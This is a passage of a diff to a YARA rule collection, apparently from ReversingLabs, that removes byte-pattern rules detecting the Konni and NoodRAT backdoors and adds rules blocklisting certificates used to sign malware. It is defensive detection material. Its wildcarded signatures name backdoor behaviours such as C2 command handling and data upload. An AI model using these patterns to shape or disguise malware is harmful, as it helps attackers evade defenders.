"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12048-L12064" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ($persistence_mechanism) and ($crypto_miner) and ($downloader) and ( all of ($network_communication_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FORTH PROPERTY LTD" and pe.signatures[i].serial=="23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE { meta: - description = "Yara rule that detects Konni backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6fe230b1-357a-54f7-a9a8-15d0369fec71" - date = "2023-12-07" - modified = "2023-12-07" + id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Win32.Backdoor.Konni.yara#L1-L190" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7907a657d804d485718ba13bb23513de0b909e7d455c2b3ee193b5329edd3ac6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12066-L12082" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "Konni" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $network_communication_p1 = { - 55 8B EC 83 EC ?? 53 56 8B 35 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? ?? 8D 9E ?? ?? ?? ?? - 57 53 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 7D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 45 ?? - 50 56 8D 8E ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? - 81 C6 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 57 57 57 6A ?? 57 FF 15 ?? ?? ?? ?? 8B D8 3B DF - 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 6A ?? 56 53 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B F8 89 7D ?? 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8D 47 ?? 5F 5E 5B 8B E5 5D C2 ?? - ?? 8B 55 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 52 68 ?? ?? ?? ?? 57 C7 45 ?? ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8B 35 ?? ?? ?? ?? 57 FF D6 53 FF D6 5F - 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? - 6A ?? 6A ?? 85 C0 74 ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 6A ?? 56 - FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E B8 ?? ?? ?? ?? - 5B 8B E5 5D C2 ?? ?? 8B 45 ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? - ?? ?? ?? FF D6 57 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 40 50 6A ?? 89 - } - $network_communication_p2 = { - 45 ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? - ?? ?? ?? FF D6 8B 4D ?? 51 FF D6 53 FF D6 5F 5E 83 C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 - ?? 52 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 6A ?? - 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 45 ?? 50 FF D6 53 FF D6 5F 5E 83 - C8 ?? 5B 8B E5 5D C2 ?? ?? 8B 55 ?? 8D 4D ?? 51 52 57 56 FF 15 ?? ?? ?? ?? 85 C0 74 - ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 85 C0 B8 ?? ?? ?? ?? 75 ?? 8B 45 ?? 89 45 ?? 83 F8 ?? 74 ?? 8B 4D ?? 8B 55 ?? 6A ?? - 8D 45 ?? 50 51 57 52 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 01 45 ?? 51 6A ?? 57 E8 ?? - ?? ?? ?? 8B 45 ?? 83 C4 ?? 8D 55 ?? 52 50 57 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4D - ?? 51 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? - 56 8B 35 ?? ?? ?? ?? FF D6 8B 55 ?? 52 FF D6 53 FF D6 83 7D ?? ?? 0F 84 ?? ?? ?? ?? - 8B 45 ?? 5F 5E 5B 8B E5 5D C2 - } - $handle_c2_commands_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 ?? ?? ?? ?? - 50 33 FF 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 89 B5 ?? ?? ?? ?? - 3B F7 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 0D ?? ?? - ?? ?? 8B 16 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B - 4E ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 56 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B - 5E ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? - ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4E ?? 57 51 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 46 ?? 52 50 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? - ?? ?? ?? E9 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 56 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 - } - $handle_c2_commands_p2 = { - C0 75 ?? 8B 46 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 69 C0 ?? ?? ?? ?? A3 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4C 86 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? BE - ?? ?? ?? ?? 85 C0 75 ?? 8D 78 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 - FF E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 8B 06 52 50 E8 - ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B - 44 96 ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 68 - ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 06 8D 50 ?? 8B FF 66 8B 08 83 - C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 57 8D 3C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB - ?? 8B 06 8D 50 ?? 66 8B 08 83 C0 ?? 66 3B CF 75 ?? 2B C2 D1 F8 6A ?? 8D 3C 45 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? A1 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 54 8E ?? 50 - 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 56 - FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C7 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $create_cab_file_and_upload_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? A1 ?? ?? ?? ?? 53 56 57 33 - FF 68 ?? ?? ?? ?? 8B F1 8D 95 ?? ?? ?? ?? 33 C9 57 52 89 85 ?? ?? ?? ?? 89 BD ?? ?? - ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 33 C0 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 - 85 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 33 D2 50 66 89 95 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 0F B7 8D ?? ?? ?? ?? 0F B7 95 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 51 0F B7 8D ?? - ?? ?? ?? 52 0F B7 95 ?? ?? ?? ?? 50 51 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 57 - 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 50 57 68 ?? ?? ?? ?? 8B C8 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 - FF 15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B D8 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? - 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? - ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? - ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B CE 8D BD ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 F8 ?? 75 ?? 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 8D - } - $create_cab_file_and_upload_p2 = { - 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 33 FF 8D 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? - ?? 8B B5 ?? ?? ?? ?? 83 C6 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 74 - ?? 56 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 3B - DF 74 ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 3B - CF 75 ?? 2B C2 8D 93 ?? ?? ?? ?? D1 F8 8D 0C 00 33 C0 89 02 89 42 ?? 89 42 ?? 89 42 - ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 3B CF 74 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 83 C4 ?? 8B CB EB ?? 33 C9 8B 95 ?? ?? ?? ?? 89 8A ?? ?? ?? ?? 3B CF 0F 84 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8B - BD ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 C7 87 ?? - ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8D 9B ?? ?? ?? ?? - 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 8D 84 46 ?? ?? ?? ?? 50 6A ?? 89 85 ?? - ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? - 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 50 - 53 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? 51 03 C3 50 E8 ?? ?? ?? ?? - 8B BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 FB 83 C4 ?? 03 FE B9 ?? ?? ?? ?? BE ?? ?? ?? - ?? 50 F3 A5 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8 - } - $create_cab_file_and_upload_p3 = { - 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 6A ?? - 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 57 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 89 85 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? - 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? - 6A ?? 56 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 C4 ?? 50 05 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? - 6A ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 8B F0 85 F6 75 ?? 8B 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 52 FF D6 57 FF D6 B8 ?? ?? - ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 53 6A - ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 - 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B - 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 95 ?? - ?? ?? ?? 52 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 - ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 B8 ?? ?? ?? ?? 5F 5E 5B 8B 4D - ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 85 C0 75 ?? 50 50 50 56 FF 15 - ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 8D ?? ?? ?? ?? 51 FF D6 57 FF D6 83 C8 - } - $create_cab_file_and_upload_p4 = { - 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 40 50 6A ?? 89 85 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 50 50 50 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? - FF D6 8B 95 ?? ?? ?? ?? 52 FF D6 57 FF D6 83 C8 ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C3 8B 85 ?? ?? ?? ?? 50 6A ?? 53 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 - C4 ?? 8D 8D ?? ?? ?? ?? 51 52 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 53 - E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 89 85 ?? ?? ?? ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? - ?? FF D6 8B 85 ?? ?? ?? ?? 50 FF D6 57 FF D6 8B 4D ?? 8B 85 ?? ?? ?? ?? 5F 5E 33 CD - 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $cmd_expand_payload = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 8B - D9 33 FF 8D 8D ?? ?? ?? ?? 33 C0 57 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? - ?? ?? 8D 85 ?? ?? ?? ?? 33 D2 57 50 66 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D - ?? ?? ?? ?? 57 51 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? - 57 6A ?? 33 C0 68 ?? ?? ?? ?? 53 89 BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? - ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 57 57 57 6A ?? 57 56 FF - 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 3B C7 75 ?? 56 FF 15 ?? ?? ?? ?? 83 C8 ?? 5F 5E 5B - 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 57 57 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F8 - 85 FF 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 47 ?? 50 6A ?? 6A ?? FF 15 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? - ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 57 ?? 83 C4 ?? 57 89 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 8B 3D ?? ?? ?? ?? 50 FF D7 56 FF D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? - 51 E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? - ?? 83 C4 ?? 33 C0 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 50 50 68 ?? ?? ?? ?? 50 - 50 50 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 6A - ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - 8B F0 83 FE ?? 75 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF D7 8B 4D ?? 8B 85 ?? ?? - ?? ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "REI LUX UK LIMITED" and pe.signatures[i].serial=="02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "2f72a686-c30c-572d-a78c-03747ac325b6" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12084-L12100" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($network_communication_p*)) and ( all of ($handle_c2_commands_p*)) and ( all of ($create_cab_file_and_upload_p*)) and ($cmd_expand_payload) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Largos" and pe.signatures[i].serial=="35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE { meta: - description = "Yara rule that detects NoodRAT backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ac5eae27-dc42-5060-b639-c23c0bbabb50" - date = "2024-08-26" - modified = "2024-08-26" + id = "6bb83f26-90f5-587f-8c69-fa06beaead3e" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L12102-L12120" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "NoodRAT" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $change_name_on_system_p1 = { - 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ?? - ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? - ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15 - ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? - 48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? - 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ?? - ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48 - 83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8 - ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 - ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? - C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? - ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? - 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85 - D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? 